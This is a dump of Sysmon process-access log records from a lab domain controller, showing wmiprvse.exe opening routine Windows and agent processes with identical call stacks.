15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 